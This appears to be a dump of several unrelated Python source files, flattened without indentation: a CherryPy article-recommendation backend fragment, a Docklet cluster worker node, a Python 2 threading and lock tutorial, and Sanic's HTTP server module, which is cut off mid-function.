def receive_user_action(self, user_vector, article_id):
if article_id in self.cached_articles:
article_to_mod = self.cached_articles[article_id]
article_to_mod.mod_article_vector(user_vector)
self.cached_articles[article_id] = article_to_mod
self.save_articles_to_json()
def threadedFunctionality(backEnd, userActions):
while(True):
if not userActions.empty():
local_set = userActions.get()
backEnd.receive_user_action(local_set[0], local_set[1])
class PythonBackEnd(object):
backEnd = pollArticles()
backEnd.poll_articles()
userActions = Queue.Queue()
t = threading.Thread(target=threadedFunctionality, args=(backEnd, userActions))
t.start()
exposed = True
def GET(self):
return self.backEnd.articles_as_json
def POST(self, user_vector, article_id):
if (int(article_id)):
userVector = json.loads(user_vector)
userVector = np.array(userVector)
print (article_id)
self.userActions.put([userVector, int(article_id)])
#self.backEnd.receive_user_action(userVector, int(article_id))
return
if __name__ == '__main__':
conf = {
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.response_headers.on': True,
'tools.response_headers.headers': [('Content-Type', 'text/plain')],
}
}
cherrypy.quickstart(PythonBackEnd(), '/', conf)
#backEnd = pollArticles()
#backEnd.poll_articles()
# test case
#uv = np.zeros((1,1000))
#uv[0,999] = 1
#vvar = 10152735
#backEnd.receive_user_action(uv, vvar)
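# Hedged usage sketch (editor's addition): with the MethodDispatcher config
# above, the service listens on CherryPy's default port 8080.  GET / returns
# the cached articles as JSON; POST / expects form fields user_vector (a JSON
# list of 1000 numbers, truncated below) and article_id.
#
#   curl http://127.0.0.1:8080/
#   curl -X POST http://127.0.0.1:8080/ \
#        --data-urlencode 'user_vector=[0.0, 0.1, 0.0, ...]' \
#        --data-urlencode 'article_id=10152735'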
|
worker.py
|
#!/usr/bin/python3
# first init env
import env, tools
config = env.getenv("CONFIG")
tools.loadenv(config)
# must import logger after initlogging, ugly
from log import initlogging
initlogging("docklet-worker")
from log import logger
import xmlrpc.server, sys, time
from socketserver import ThreadingMixIn
import threading
import etcdlib, network, container
from nettools import netcontrol
import monitor
from lvmtool import new_group, recover_group
import psutil
##################################################################
# Worker
# Description : Worker starts on the worker node to listen for rpc requests and do the work
# Init() :
# get master ip
# initialize rpc server
# register rpc functions
# initialize network
# initialize lvm group
# Start() :
# register in etcd
# setup GRE tunnel
# start rpc service
##################################################################
# imitate etcdlib to generate the etcdlib key manually
def generatekey(path):
clustername = env.getenv("CLUSTER_NAME")
return '/'+clustername+'/'+path
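# For example, with CLUSTER_NAME=docklet (cluster name and address below are
# illustrative assumptions only):
#   generatekey("machines/allnodes/192.168.1.10")
#   -> "/docklet/machines/allnodes/192.168.1.10"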
class ThreadXMLRPCServer(ThreadingMixIn,xmlrpc.server.SimpleXMLRPCServer):
pass
class Worker(object):
def __init__(self, etcdclient, addr, port):
self.addr = addr
self.port = port
logger.info ("begin initialize on %s" % self.addr)
self.fspath = env.getenv('FS_PREFIX')
self.poolsize = env.getenv('DISKPOOL_SIZE')
self.etcd = etcdclient
self.master = self.etcd.getkey("service/master")[1]
self.mode=None
        # the waiting state is preserved for compatibility.
self.etcd.setkey("machines/runnodes/"+self.addr, "waiting")
# get this node's key to judge how to init.
[status, key] = self.etcd.getkey("machines/runnodes/"+self.addr)
if status:
self.key = generatekey("machines/allnodes/"+self.addr)
else:
logger.error("get key failed. %s" % 'machines/runnodes/'+self.addr)
sys.exit(1)
        # check the token to verify the global directory
[status, token_1] = self.etcd.getkey("token")
tokenfile = open(self.fspath+"/global/token", 'r')
token_2 = tokenfile.readline().strip()
if token_1 != token_2:
logger.error("check token failed, global directory is not a shared filesystem")
sys.exit(1)
logger.info ("worker registered and checked the token")
        # the worker searches all nodes to decide how to init:
        # if this node is in the allnodes list, recover it;
        # otherwise, this node is newly added.
value = 'init-new'
[status, alllist] = self.etcd.listdir("machines/allnodes")
for node in alllist:
if node['key'] == self.key:
value = 'init-recovery'
break
logger.info("worker start in "+value+" mode")
Containers = container.Container(self.addr, etcdclient)
if value == 'init-new':
logger.info ("init worker with mode:new")
self.mode='new'
            # check that the global directory has no containers recorded for this worker
[both, onlylocal, onlyglobal] = Containers.diff_containers()
if len(both+onlyglobal) > 0:
logger.error ("mode:new will clean containers recorded in global, please check")
sys.exit(1)
[status, info] = Containers.delete_allcontainers()
if not status:
logger.error ("delete all containers failed")
sys.exit(1)
# create new lvm VG at last
new_group("docklet-group",self.poolsize,self.fspath+"/local/docklet-storage")
#subprocess.call([self.libpath+"/lvmtool.sh", "new", "group", "docklet-group", self.poolsize, self.fspath+"/local/docklet-storage"])
elif value == 'init-recovery':
logger.info ("init worker with mode:recovery")
self.mode='recovery'
# recover lvm VG first
recover_group("docklet-group",self.fspath+"/local/docklet-storage")
#subprocess.call([self.libpath+"/lvmtool.sh", "recover", "group", "docklet-group", self.fspath+"/local/docklet-storage"])
[status, meg] = Containers.check_allcontainers()
if status:
logger.info ("all containers check ok")
else:
logger.info ("not all containers check ok")
#sys.exit(1)
else:
logger.error ("worker init mode:%s not supported" % value)
sys.exit(1)
# initialize rpc
# xmlrpc.server.SimpleXMLRPCServer(addr) -- addr : (ip-addr, port)
# if ip-addr is "", it will listen ports of all IPs of this host
logger.info ("initialize rpcserver %s:%d" % (self.addr, int(self.port)))
# logRequests=False : not print rpc log
#self.rpcserver = xmlrpc.server.SimpleXMLRPCServer((self.addr, self.port), logRequests=False)
self.rpcserver = ThreadXMLRPCServer((self.addr, int(self.port)), allow_none=True, logRequests=False)
self.rpcserver.register_introspection_functions()
self.rpcserver.register_instance(Containers)
self.rpcserver.register_function(monitor.workerFetchInfo)
# register functions or instances to server for rpc
#self.rpcserver.register_function(function_name)
        # init collector to collect monitor information
self.con_collector = monitor.Container_Collector()
self.hosts_collector = monitor.Collector()
# initialize the network
# if worker and master run on the same node, reuse bridges
# don't need to create new bridges
if (self.addr == self.master):
logger.info ("master also on this node. reuse master's network")
else:
logger.info ("initialize network")
# 'docklet-br' of worker do not need IP Addr.
#[status, result] = self.etcd.getkey("network/workbridge")
#if not status:
# logger.error ("get bridge IP failed, please check whether master set bridge IP for worker")
#self.bridgeip = result
# create bridges for worker
#network.netsetup("init", self.bridgeip)
if self.mode == 'new':
if netcontrol.bridge_exists('docklet-br'):
netcontrol.del_bridge('docklet-br')
netcontrol.new_bridge('docklet-br')
else:
if not netcontrol.bridge_exists('docklet-br'):
logger.error("docklet-br not found")
sys.exit(1)
logger.info ("setup GRE tunnel to master %s" % self.master)
#network.netsetup("gre", self.master)
if not netcontrol.gre_exists('docklet-br', self.master):
netcontrol.setup_gre('docklet-br', self.master)
# start service of worker
def start(self):
# start collector
self.con_collector.start()
self.hosts_collector.start()
logger.info("Monitor Collector has been started.")
        # the worker changes its state itself, independently from the master.
self.etcd.setkey("machines/runnodes/"+self.addr, "work")
self.etcd.setkey("cpus/"+self.addr,psutil.cpu_count())
self.etcd.setkey("mems/"+self.addr,str(int(psutil.virtual_memory().total/1024/1024)))
self.thread_sendheartbeat = threading.Thread(target=self.sendheartbeat)
self.thread_sendheartbeat.start()
# start serving for rpc
logger.info ("begins to work")
self.rpcserver.serve_forever()
    # send heartbeat packets to keep alive in etcd, ttl=2s
def sendheartbeat(self):
while(True):
# check send heartbeat package every 1s
time.sleep(1)
[status, value] = self.etcd.getkey("machines/runnodes/"+self.addr)
if status:
                # master knows about the worker, so we start sending heartbeat packets
if value=='ok':
self.etcd.setkey("machines/runnodes/"+self.addr, "ok", ttl = 2)
else:
logger.error("get key %s failed, master crashed or initialized. restart worker please." % self.addr)
sys.exit(1)
if __name__ == '__main__':
etcdaddr = env.getenv("ETCD")
logger.info ("using ETCD %s" % etcdaddr )
clustername = env.getenv("CLUSTER_NAME")
logger.info ("using CLUSTER_NAME %s" % clustername )
# get network interface
net_dev = env.getenv("NETWORK_DEVICE")
logger.info ("using NETWORK_DEVICE %s" % net_dev )
ipaddr = network.getip(net_dev)
if ipaddr is False:
logger.error("network device is not correct")
sys.exit(1)
else:
logger.info("using ipaddr %s" % ipaddr)
# init etcdlib client
try:
etcdclient = etcdlib.Client(etcdaddr, prefix = clustername)
except Exception:
logger.error ("connect etcd failed, maybe etcd address not correct...")
sys.exit(1)
else:
logger.info("etcd connected")
cpu_quota = env.getenv('CONTAINER_CPU')
logger.info ("using CONTAINER_CPU %s" % cpu_quota )
mem_quota = env.getenv('CONTAINER_MEMORY')
logger.info ("using CONTAINER_MEMORY %s" % mem_quota )
worker_port = env.getenv('WORKER_PORT')
logger.info ("using WORKER_PORT %s" % worker_port )
logger.info("Starting worker")
worker = Worker(etcdclient, addr=ipaddr, port=worker_port)
worker.start()
|
ThreadChapter10.py
|
# encoding:UTF-8
__author__ = 'Hope6537'
import threading
import time
# Code to be executed by the new thread:
def loop():
print 'thread %s is running...' % threading.current_thread().name
n = 0
while n < 5:
n = n + 1
print 'thread %s >>> %s' % (threading.current_thread().name, n)
time.sleep(1)
print 'thread %s ended.' % threading.current_thread().name
print 'thread %s is running...' % threading.current_thread().name
t = threading.Thread(target=loop, name='LoopThread')
# t.start()
# t.join()
print 'thread %s ended.' % threading.current_thread().name
# Threads cooperating to modify a shared variable
# Suppose this is your bank balance:
balance = 0
lock = threading.Lock()
# To make sure balance is computed correctly, change_it() must be protected by a lock: when one thread starts executing change_it(), other threads must wait until the lock is released
def change_it(n):
    # deposit first, then withdraw; the result should be 0:
global balance
balance = balance + n
balance = balance - n
def run_thread(n):
for i in range(100000):
lock.acquire()
try:
            # safe to modify now:
change_it(n)
finally:
            # always release the lock when done:
lock.release()
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print balance
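# A minimal sketch of the same experiment *without* the lock (editor's
# addition, illustrative only): balance = balance + n compiles to several
# bytecode steps (read, add, store), so two threads can interleave and the
# final balance often ends up nonzero.
#
#   def run_thread_unsafe(n):
#       for i in range(100000):
#           change_it(n)
#
#   t3 = threading.Thread(target=run_thread_unsafe, args=(5,))
#   t4 = threading.Thread(target=run_thread_unsafe, args=(8,))
#   t3.start(); t4.start(); t3.join(); t4.join()
#   print balance   # frequently != 0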
|
server.py
|
import asyncio
import os
import traceback
from collections import deque
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser # type: ignore
from httptools.parser.errors import HttpParserError # type: ignore
from sanic.compat import Header
from sanic.exceptions import (
HeaderExpectationFailed,
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import EXPECT_HEADER, Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop # type: ignore
if not isinstance(asyncio.get_event_loop_policy(), uvloop.EventLoopPolicy):
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# app
"app",
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"router",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_debug",
)
def __init__(
self,
*,
loop,
app,
request_handler,
error_handler,
signal=Signal(),
connections=None,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
request_max_size=None,
request_buffer_queue_size=100,
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
state=None,
debug=False,
**kwargs
):
self.loop = loop
self.app = app
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.router = router
self.signal = signal
self.access_log = access_log
self.connections = connections if connections is not None else set()
self.request_handler = request_handler
self.error_handler = error_handler
self.request_timeout = request_timeout
self.request_buffer_queue_size = request_buffer_queue_size
self.response_timeout = response_timeout
self.keep_alive_timeout = keep_alive_timeout
self.request_max_size = request_max_size
self.request_class = request_class or Request
self.is_request_stream = is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = keep_alive
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._debug = debug
self._not_paused.set()
self._body_chunks = deque()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
        :return: ``True`` if the connection is to be kept alive, ``False`` otherwise
"""
return (
self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = time()
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
        # Check if elapsed time since the response was initiated exceeds our
        # configured maximum response timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.response_timeout:
time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = time() - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self._debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=Header(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
app=self.app,
)
# Remove any existing KeepAlive handler here,
# It will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.request.headers.get(EXPECT_HEADER):
self.expect_handler()
if self.is_request_stream:
self._is_stream_handler = self.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def expect_handler(self):
"""
Handler for Expect Header.
"""
expect = self.request.headers.get(EXPECT_HEADER)
if self.request.version == "1.1":
if expect.lower() == "100-continue":
self.transport.write(b"HTTP/1.1 100 Continue\r\n\r\n")
else:
self.write_error(
HeaderExpectationFailed(
"Unknown Expect: {expect}".format(expect=expect)
)
)
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
# body chunks can be put into asyncio.Queue out of order if
# multiple tasks put concurrently and the queue is full in python
# 3.7. so we should not create more than one task putting into the
# queue simultaneously.
self._body_chunks.append(body)
if (
not self._request_stream_task
or self._request_stream_task.done()
):
self._request_stream_task = self.loop.create_task(
self.stream_append()
)
else:
self.request.body_push(body)
async def stream_append(self):
while self._body_chunks:
body = self._body_chunks.popleft()
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._body_chunks.append(None)
if (
not self._request_stream_task
or self._request_stream_task.done()
):
self._request_stream_task = self.loop.create_task(
self.stream_append()
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = time()
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
        Helper method provided to enable the logging of responses in case
the :attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = "{0}:{1}".format(
self.request.ip, self.request.port
)
extra["request"] = "{0} {1}".format(
self.request.method, self.request.url
)
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
async def drain(self):
await self._not_paused.wait()
async def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout, when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
"Writing error failed, connection closed {}".format(repr(e)),
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
        In case the transport pipes are closed and the sanic app encounters
an error while writing data to the transport pipe, we log the error
with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport is None or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
(
self.transport.get_extra_info("peername")
if self.transport is not None
else "N/A"
),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
:return: boolean - True if closed, false if staying open
"""
if not self.parser:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
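
# --- Hedged example (editor's addition, not part of Sanic) ------------------
# trigger_events accepts a mix of plain callables and coroutine functions:
# synchronous listeners run immediately, awaitable results are driven to
# completion on the supplied loop.  The two listeners below are illustrative.
def _example_trigger_events():
    def sync_listener(loop):
        logger.info("sync listener ran")

    async def async_listener(loop):
        await asyncio.sleep(0)
        logger.info("async listener ran")

    loop = asyncio.new_event_loop()
    try:
        trigger_events([sync_listener, async_listener], loop)
    finally:
        loop.close()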
class AsyncioServer:
"""
Wraps an asyncio server with functionality that might be useful to
a user who needs to manage the server lifecycle manually.
"""
__slots__ = (
"loop",
"serve_coro",
"_after_start",
"_before_stop",
"_after_stop",
"server",
"connections",
)
def __init__(
self,
loop,
serve_coro,
connections,
after_start,
before_stop,
after_stop,
):
# Note, Sanic already called "before_server_start" events
# before this helper was even created. So we don't need it here.
self.loop = loop
self.serve_coro = serve_coro
self._after_start = after_start
self._before_stop = before_stop
self._after_stop = after_stop
self.server = None
self.connections = connections
def after_start(self):
"""Trigger "after_server_start" events"""
trigger_events(self._after_start, self.loop)
def before_stop(self):
"""Trigger "before_server_stop" events"""
trigger_events(self._before_stop, self.loop)
def after_stop(self):
"""Trigger "after_server_stop" events"""
trigger_events(self._after_stop, self.loop)
def is_serving(self):
if self.server:
return self.server.is_serving()
return False
def wait_closed(self):
if self.server:
return self.server.wait_closed()
def close(self):
if self.server:
self.server.close()
coro = self.wait_closed()
task = asyncio.ensure_future(coro, loop=self.loop)
return task
def __await__(self):
"""Starts the asyncio server, returns AsyncServerCoro"""
task = asyncio.ensure_future(self.serve_coro)
while not task.done():
yield
self.server = task.result()
return self
def serve(
host,
port,
app,
request_handler,
error_handler,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
debug=False,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
ssl=None,
sock=None,
request_max_size=None,
request_buffer_queue_size=100,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
websocket_max_size=None,
websocket_max_queue=None,
websocket_read_limit=2 ** 16,
websocket_write_limit=2 ** 16,
state=None,
graceful_shutdown_timeout=15.0,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param request_handler: Sanic request handler with middleware
:param error_handler: Sanic error handler with middleware
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param debug: enables debug output (slows server)
:param request_timeout: time in seconds
:param response_timeout: time in seconds
:param keep_alive_timeout: time in seconds
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param request_max_size: size in bytes, `None` for no limit
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param protocol: subclass of asyncio protocol class
:param run_async: bool: Do not create a new event loop for the server,
and return an AsyncServer object rather than running it
:param request_class: Request class to use
:param access_log: disable/enable access log
:param websocket_max_size: enforces the maximum size for
incoming messages in bytes.
:param websocket_max_queue: sets the maximum length of the queue
that holds incoming messages.
:param websocket_read_limit: sets the high-water limit of the buffer for
incoming bytes, the low-water limit is half
the high-water limit.
:param websocket_write_limit: sets the high-water limit of the buffer for
outgoing bytes, the low-water limit is a
quarter of the high-water limit.
:param is_request_stream: disable/enable Request.stream
:param request_buffer_queue_size: streaming request buffer queue size
:param router: Router object
    :param graceful_shutdown_timeout: how long to wait before force-closing
                                      non-idle connections
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
app.asgi = False
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
app=app,
request_handler=request_handler,
error_handler=error_handler,
request_timeout=request_timeout,
response_timeout=response_timeout,
keep_alive_timeout=keep_alive_timeout,
request_max_size=request_max_size,
request_buffer_queue_size=request_buffer_queue_size,
request_class=request_class,
access_log=access_log,
keep_alive=keep_alive,
is_request_stream=is_request_stream,
router=router,
websocket_max_size=websocket_max_size,
websocket_max_queue=websocket_max_queue,
websocket_read_limit=websocket_read_limit,
websocket_write_limit=websocket_write_limit,
state=state,
debug=debug,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs
)
if run_async:
return AsyncioServer(
loop,
server_coroutine,
connections,
after_start,
before_stop,
after_stop,
)
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
        _signals = (SIGTERM,) if run_multiple else (SIGINT, SIGTERM)
        for _signal in _signals:
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
logger.warning(
"Sanic tried to use loop.add_signal_handler "
"but it is not implemented on this platform."
)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
    # Graceful shutdown timeout:
    # we honour graceful_shutdown_timeout instead of letting connections
    # hang forever, and roughly track the elapsed time.
start_shutdown = 0
while connections and (start_shutdown < graceful_shutdown_timeout):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros, loop=loop)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
